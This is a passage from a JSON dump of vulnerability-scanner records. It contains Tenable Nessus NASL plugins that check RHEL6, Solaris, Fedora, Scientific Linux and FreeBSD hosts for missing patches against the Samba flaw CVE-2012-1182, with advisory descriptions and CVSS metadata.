value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0515\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-debuginfo-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-client-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-client-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-debuginfo-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-debuginfo / evolution-mapi-devel / etc\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:47:18", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an array length in a manner consistent with validation of array memory allocation, which allows remote attackers to execute arbitrary code via a crafted RPC call. (CVE-2012-1182)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : samba (cve_2012_1182_arbitrary_code)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.0", "p-cpe:/a:oracle:solaris:samba"], "id": "SOLARIS11_SAMBA_20121016.NASL", "href": "https://www.tenable.com/plugins/nessus/80762", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80762);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : samba (cve_2012_1182_arbitrary_code)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The RPC code generator in Samba 3.x before 3.4.16, 3.5.x\n before 3.5.14, and 3.6.x before 3.6.4 does not implement\n validation of an array length in a manner consistent\n with validation of array memory allocation, which allows\n remote attackers to execute arbitrary code via a crafted\n RPC call. (CVE-2012-1182)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2012-1182-arbitrary-code-execution-vulnerability-in-samba\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?640cfd84\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 7.5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:samba\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^samba$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.7.0.5.0\", sru:\"SRU 7.5\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : samba\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"samba\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:28", "description": "This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-05-04T00:00:00", "type": "nessus", "title": "Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-6349.NASL", "href": "https://www.tenable.com/plugins/nessus/58980", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6349.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58980);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6349\");\n\n script_name(english:\"Fedora 15 : samba4-4.0.0-26.alpha11.fc15.6 (2012-6349)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c44225e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"samba4-4.0.0-26.alpha11.fc15.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:55:47", "description": "A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used to generate code to handle RPC calls. This could result in code generated by the PIDL compiler to not sufficiently protect against buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which provides a number of bug fixes and enhancements over the previous version. In particular, improved interoperability with Active Directory (AD) domains. SSSD now uses the libndr-krb5pac library to parse the Privilege Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity Management, which relies on the capabilities of the samba4 client library, is included as a Technology Preview. This functionality and server libraries, is included as a Technology Preview. This functionality uses the libndr-nbt library to prepare Connection-less Lightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security Authority (LSA) and Net Logon services to allow verification of trust from a Windows system. Because the Cross Realm Kerberos Trust functionality is considered a Technology Preview, selected samba4 components are considered to be a Technology Preview. For more information on which Samba packages are considered a Technology Preview, refer to Table 5.1, 'Samba4 Package Support' in the Release Notes, linked to from the References.\n\nThis update also fixes the following bug :\n\n - Prior to this update, if the Active Directory (AD) server was rebooted, Winbind sometimes failed to reconnect when requested by 'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users using the wbinfo tool failed. This update applies upstream patches to fix this problem and now looking up a Security Identifier (SID) for a username, or a username for a given SID, works as expected after a domain controller is rebooted.\n\nWarning: If you upgrade from Scientific Linux 6.3 to Scientific Linux 6.4 and you have Samba in use, you should make sure that you uninstall the package named 'samba4' to avoid conflicts during the upgrade.", "cvss3": {"score": null, "vector": null}, "published": "2013-03-05T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba4", "p-cpe:/a:fermilab:scientific_linux:samba4-client", "p-cpe:/a:fermilab:scientific_linux:samba4-common", "p-cpe:/a:fermilab:scientific_linux:samba4-dc", "p-cpe:/a:fermilab:scientific_linux:samba4-dc-libs", "p-cpe:/a:fermilab:scientific_linux:samba4-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba4-devel", "p-cpe:/a:fermilab:scientific_linux:samba4-libs", "p-cpe:/a:fermilab:scientific_linux:samba4-pidl", "p-cpe:/a:fermilab:scientific_linux:samba4-python", "p-cpe:/a:fermilab:scientific_linux:samba4-swat", "p-cpe:/a:fermilab:scientific_linux:samba4-test", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba4-winbind-krb5-locator", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20130221_SAMBA4_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/65015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba4 on SL6.x i386/x86_64 (20130221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References.\n\nThis update also fixes the following bug :\n\n - Prior to this update, if the Active Directory (AD)\n server was rebooted, Winbind sometimes failed to\n reconnect when requested by 'wbinfo -n' or 'wbinfo -s'\n commands. Consequently, looking up users using the\n wbinfo tool failed. This update applies upstream patches\n to fix this problem and now looking up a Security\n Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller\n is rebooted.\n\nWarning: If you upgrade from Scientific Linux 6.3 to Scientific Linux\n6.4 and you have Samba in use, you should make sure that you uninstall\nthe package named 'samba4' to avoid conflicts during the upgrade.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=206\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c774b705\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:40", "description": "Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the 'root' user from an anonymous connection.\n\nAs this does not require an authenticated connection it is the most serious vulnerability possible in a program, and users and vendors are encouraged to patch their Samba installations immediately.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba34", "p-cpe:/a:freebsd:freebsd:samba35", "p-cpe:/a:freebsd:freebsd:samba36", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/58671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR 